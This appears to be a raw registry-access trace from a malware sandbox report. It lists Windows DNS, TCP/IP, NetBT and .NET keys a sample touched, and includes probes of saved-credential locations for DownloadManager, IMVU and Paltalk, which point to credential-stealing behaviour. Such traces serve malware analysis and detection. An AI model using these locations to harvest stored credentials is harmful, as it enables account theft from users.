HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\ScreenDefaultServers
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\DynamicServerQueryOrder
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\DynamicServerQueryOrder
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\FilterClusterIp
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\FilterClusterIp
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\WaitForNameErrorOnAll
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\WaitForNameErrorOnAll
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\UseEdns
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\UseEdns
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\DnsSecureNameQueryFallback
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\DnsSecureNameQueryFallback
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\EnableDAForAllNetworks
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\EnableDAForAllNetworks
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\DirectAccessQueryOrder
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\DirectAccessQueryOrder
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\QueryIpMatching
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\QueryIpMatching
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\UseHostsFile
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\UseHostsFile
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\AddrConfigControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\AddrConfigControl
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\RegistrationEnabled
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\RegistrationEnabled
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\DisableDynamicUpdate
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\RegisterPrimaryName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\RegisterPrimaryName
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\RegisterAdapterName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\RegisterAdapterName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\EnableAdapterDomainNameRegistration
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\RegisterReverseLookup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\RegisterReverseLookup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\DisableReverseAddressRegistrations
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\RegisterWanAdapters
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\RegisterWanAdapters
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\DisableWanDynamicUpdate
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\RegistrationTtl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\RegistrationTtl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\DefaultRegistrationTTL
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\RegistrationRefreshInterval
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\RegistrationRefreshInterval
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\DefaultRegistrationRefreshInterval
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\RegistrationMaxAddressCount
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\RegistrationMaxAddressCount
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\MaxNumberOfAddressesToRegister
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\UpdateSecurityLevel
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\UpdateSecurityLevel
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\UpdateSecurityLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\UpdateTopLevelDomainZones
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\UpdateTopLevelDomainZones
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\DowncaseSpnCauseApiOwnerIsTooLazy
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\DowncaseSpnCauseApiOwnerIsTooLazy
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\RegistrationOverwrite
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\RegistrationOverwrite
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\MaxCacheSize
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\MaxCacheSize
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\MaxCacheTtl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\MaxCacheTtl
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\MaxNegativeCacheTtl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\MaxNegativeCacheTtl
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\AdapterTimeoutLimit
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\AdapterTimeoutLimit
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\ServerPriorityTimeLimit
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\ServerPriorityTimeLimit
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\MaxCachedSockets
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\MaxCachedSockets
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\EnableMulticast
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\MulticastResponderFlags
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\MulticastResponderFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\MulticastSenderFlags
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\MulticastSenderFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\MulticastSenderMaxTimeout
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\MulticastSenderMaxTimeout
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\DnsTest
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\UseCompartments
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\CacheAllCompartments
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\UseNewRegistration
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\ResolverRegistration
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\ResolverRegistrationOnly
HKEY_LOCAL_MACHINE\System\Setup
HKEY_LOCAL_MACHINE\SYSTEM\Setup\SystemSetupInProgress
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\DnsQueryTimeouts
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\DnsQueryTimeouts
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\DnsQuickQueryTimeouts
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\DnsQuickQueryTimeouts
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\PrimaryDomainName
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\System\DNSClient
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Domain
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Hostname
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\EnableAdapterDomainNameRegistration
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\AdapterDomainName
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{C2D43895-0262-4873-A789-C2F96D24B693}
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{C2D43895-0262-4873-A789-C2F96D24B693}\QueryAdapterName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{C2D43895-0262-4873-A789-C2F96D24B693}\DisableAdapterDomainName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{C2D43895-0262-4873-A789-C2F96D24B693}\RegistrationEnabled
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{C2D43895-0262-4873-A789-C2F96D24B693}\RegisterAdapterName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{C2D43895-0262-4873-A789-C2F96D24B693}\RegistrationMaxAddressCount
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{C2D43895-0262-4873-A789-C2F96D24B693}\MaxNumberOfAddressesToRegister
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{C2D43895-0262-4873-A789-C2F96D24B693}\Domain
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{C2D43895-0262-4873-A789-C2F96D24B693}\DhcpDomain
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{846EE342-7039-11DE-9D20-806E6F6E6963}
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{846ee342-7039-11de-9d20-806e6f6e6963}\QueryAdapterName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{846ee342-7039-11de-9d20-806e6f6e6963}\DisableAdapterDomainName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{846ee342-7039-11de-9d20-806e6f6e6963}\RegistrationEnabled
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{846ee342-7039-11de-9d20-806e6f6e6963}\DisableDynamicUpdate
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{846ee342-7039-11de-9d20-806e6f6e6963}\RegisterAdapterName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{846ee342-7039-11de-9d20-806e6f6e6963}\EnableAdapterDomainNameRegistration
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{846ee342-7039-11de-9d20-806e6f6e6963}\RegistrationMaxAddressCount
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{846ee342-7039-11de-9d20-806e6f6e6963}\MaxNumberOfAddressesToRegister
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{846ee342-7039-11de-9d20-806e6f6e6963}\Domain
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{846ee342-7039-11de-9d20-806e6f6e6963}\DhcpDomain
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\SearchList
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\SearchList
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\SQMClient\Windows
HKEY_LOCAL_MACHINE\Software\Microsoft\SQMClient\Windows
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\CEIPEnable
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NetBT\Parameters
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetBT\Parameters\NodeType
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetBT\Parameters\DhcpNodeType
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetBT\Parameters\ScopeId
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetBT\Parameters\DhcpScopeId
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetBT\Parameters\EnableProxy
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetBT\Parameters\EnableDns
HKEY_CURRENT_USER\Software\IMVU\username
HKEY_CURRENT_USER\Software\DownloadManager\Passwords
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5a8de2c3\2b1a4e4
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5a8de2c3\2b1a4e4\47
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5a8de2c3\2b1a4e4\47\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5a8de2c3\2b1a4e4\47\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5a8de2c3\2b1a4e4\47\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5a8de2c3\2b1a4e4\47\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5a8de2c3\2b1a4e4\47\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5a8de2c3\2b1a4e4\47\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5a8de2c3\2b1a4e4\47\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5a8de2c3\2b1a4e4\47\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5a8de2c3\2b1a4e4\47\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\73843e06\43a920ef\66
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\73843e06\43a920ef\66\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\73843e06\43a920ef\66\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\73843e06\43a920ef\66\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\73843e06\43a920ef\66\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\73843e06\43a920ef\66\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\141dfd70\6b79efab\43
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\141dfd70\6b79efab\43\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\141dfd70\6b79efab\43\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\141dfd70\6b79efab\43\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\141dfd70\6b79efab\43\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\141dfd70\6b79efab\43\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.8.0.Microsoft.JScript__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\Microsoft.JScript,8.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Configuration.Install__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Configuration.Install,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_CURRENT_USER\Software\Paltalk
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\COM3
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\COM3\FinalizerActivityBypass
Read Keys
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\InstallRoot
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\CLRLoadLogDir
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\UseLegacyV2RuntimeActivationPolicyDefaultValue
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\OnlyUseLatestCLR
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Fusion\NoClientChecks
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\SideBySide\PreferExternalManifest
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\GCStressStart
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\GCStressStartAtJit
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\DisableConfigCache
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\CacheLocation
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\DownloadCacheQuotaInKB
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\EnableLog
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LoggingLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\ForceLog
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LogFailures
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\VersioningLog
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LogResourceBinds
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\UseLegacyIdentityFormat
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\DisableMSIPeek
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NoClientChecks
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DevOverrideEnable
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\LatestIndex
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index126\NIUsageMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index126\ILUsageMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\mscorlib,2.0.0.0,,b77a5c561934e089,x86
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\Latest
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\index21
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\LegacyPolicyTimeStamp
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\LastModTime
